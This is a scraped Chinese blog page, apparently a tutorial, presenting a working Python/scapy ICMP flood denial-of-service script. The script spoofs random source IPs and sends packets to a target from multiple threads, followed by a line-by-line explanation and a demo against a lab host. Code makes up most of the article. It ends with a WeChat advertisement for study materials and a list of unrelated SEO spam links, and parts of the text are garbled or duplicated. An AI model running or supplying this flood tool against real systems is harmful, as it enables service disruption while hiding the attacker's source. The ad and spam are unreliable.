当前位置: 首页 > news >正文

南昌 网站制作百度一下知道首页

南昌 网站制作,百度一下知道首页,网站seo软件,给人建设网站能赚钱吗def main(): import sys ICMP_FLOOD(create_ip(),str(sys.argv[1])) if name ‘main’: main() 可以看到我们在代码中,使用create_ip()来随机生成源ip地址来伪造ip,然后在ICMP_FLOOD()来发起攻击,在这个函数里我们构造了IP/ICMP的数据包&a…

def main():
import sys
ICMP_FLOOD(create_ip(),str(sys.argv[1]))

if name == ‘main’:
main()

  • 可以看到我们在代码中,使用create_ip()来随机生成源ip地址来伪造ip,
  • 然后在ICMP_FLOOD()来发起攻击,在这个函数里我们构造了IP/ICMP的数据包,使用for循环来发送指定的包次。
  • 最后在main()函数中调用来实现攻击。

我们本次以Ubuntu这台机器为攻击目标,IP地址是:192.168.64.140,我们通过iftop来监测网络流量数据

我们来看看效果:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

可以看到,随着我们发的包越来越多,iftop的检测数据的条也就越来越长,相应的数据大小也有明显的变化。

以下是改进之后的ICMP Flood DOS python代码:

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

data_package_number = 0

class IFD():
def init(self):
pass
def icmp_dos_log(self):
log =“”"
___ ____ __ __ ____ ____ ___ ____ options:
|_ / | / | _ \ | _ \ / _ / | --appoint ip:
| | | | |/| | |
) | | | | | | | _
\ -d >> -d[objective ip]
| | |
| | | | __/ | |
| | || |) | --appoint send package number(recommend even):
|
_|| ||| |/ ___/|_/ -o >> -o[number]

version: v_1.1 developer: hare

“”"
return log

def create_ip(self):
from ipaddress import ip_network
self.ip_pool = []
r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
for ip in r_ip:
self.ip_pool.append(ip)
return str(choice(self.ip_pool))

def send_data_package(self,ip_dst,sp_num):
global data_package_number
sp_num = int(int(sp_num)/2)

ip_src = self.create_ip()

for i in range(sp_num):
ip_src = self.create_ip()
data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
send(data_package,verbose=False)
print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !“)
data_package_number+=1
if sp_num%2 != 0:
ip_src = self.create_ip()
data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
send(data_package, verbose=False)
print(f”[+]rip:{ip_src}—>dip:{ip_dst} Ok !")
data_package_number += 1

def main():
import sys
icmp_flood_dos = IFD()
print(icmp_flood_dos.icmp_dos_log())
try:
if sys.argv[1] == “-d” and sys.argv[3] == “-o”:
time_1 = time.time()
thread_pool = []
for thread in range(2):
dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
dos_thread.start()
thread_pool.append(dos_thread)
for tp in thread_pool:
tp.join()
time_2 = time.time()
times = time_2-time_1
print(f"\r\n[*]The runtime of this attack is:({times}) second !“)
print(”[+]data package number is: “,data_package_number)
else:
print(”[Error Type] options type is error !“)
time.sleep(1)
except:
if len(sys.argv) == 1:
pass
else:
print(”[Error Options] options is error !")
time.sleep(1)
if name == ‘main’:
main()
time.sleep(2)

下面给出代码的解析:

一、 导入需要的库

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

二、定义一个类IFD,包含icmp_dos_log()、create_ip()和send_data_package()三个方法

class IFD():
def init(self):
pass
def icmp_dos_log(self):

返回攻击脚本的log界面及使用说明

log =“”"
___ ____ __ __ ____ ____ ___ ____ options:
|_ / | / | _ \ | _ \ / _ / | --appoint ip:
| | | | |/| | |
) | | | | | | | _
\ -d >> -d[objective ip]
| | |
| | | | __/ | |
| | || |) | --appoint send package number(recommend even):
|
_|| ||| |/ ___/|_/ -o >> -o[number]

version: v_1.1 developer: hare

“”"
return log

随机生成源IP地址

def create_ip(self):
from ipaddress import ip_network
self.ip_pool = []
r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
for ip in r_ip:

将生成的IP网络地址池加入到ip_pool列表中

self.ip_pool.append(ip)

返回随机选择的IP地址

return str(choice(self.ip_pool))

def send_data_package(self,ip_dst,sp_num):
global data_package_number

将要发送的数据包数量除以2,因为会有两个线程分别发送,为了避免重复,每个线程发送数据包数量为总数的一半。

sp_num = int(int(sp_num)/2)
for i in range(sp_num):
#调用create_ip生成源ip地址,使每次发包产生不同的源ip地址
ip_src = self.create_ip()

构造ICMP数据包

data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))

发送数据包

send(data_package,verbose=False)

打印发送成功信息

print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !")
data_package_number+=1

若数据包数量为奇数,则再发送一份数据包(即多发送一次)

if sp_num%2 != 0:
ip_src = self.create_ip()
data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
send(data_package, verbose=False)
print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !")

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
[外链图片转存中…(img-bMseYNnn-1712712039753)]

http://www.hkea.cn/news/471446/

相关文章:

  • 河南省网站建设哪家好免费观看行情软件网站进入
  • 粘合剂东莞网站建设体育热点新闻
  • 百度网站排名关键词整站优化培训网站建设
  • 网络平台代理seo外包 杭州
  • 东方头条网站源码免费推广软件工具
  • 北京网站建设公司分享网站改版注意事项流程优化四个方法
  • 案例学 网页设计与网站建设手机百度seo快速排名
  • 江门网站建设总部电话产品推广渠道有哪些
  • 网站建设全攻略站长之家ping检测
  • 导航网站 cmsgoogle chrome谷歌浏览器
  • wordpress看其他人博客优化师是做什么的
  • 现在哪个网站还做白拿2021小说排行榜百度风云榜
  • 网站流量seo提升seo排名的方法
  • 做html网站模板下载地址网站页面布局和样式设计
  • 公司网站邮箱费用磁力宅在线搜种子
  • wordpress 缺少临时文件夹刷关键词优化排名
  • 做网站要有什么团队淘宝关键词排名查询工具
  • 开源门户网站源码宁波谷歌seo
  • wordpress+一页一屏seo关键技术有哪些
  • 学校校园网站建设实施方案精准营销的案例
  • 腾讯云服务器可以做网站可以推广发广告的app
  • seo外链友情链接网站运营推广选择乐云seo
  • 做网站 要学 什么语言网站优化公司
  • 天乐测绘网做网站吗搜索引擎广告图片
  • 湖南营销型网站建设多少钱百度关键词优化软件网站
  • 怎样给网站做关键词优化百度词条
  • 做网站哪个平台搭建网站需要什么技术
  • 做gif图的网站简述网络营销的主要方法
  • 做图网站被告seo视频网页入口网站推广
  • 做的网站底部应该标注什么意思免费文案素材网站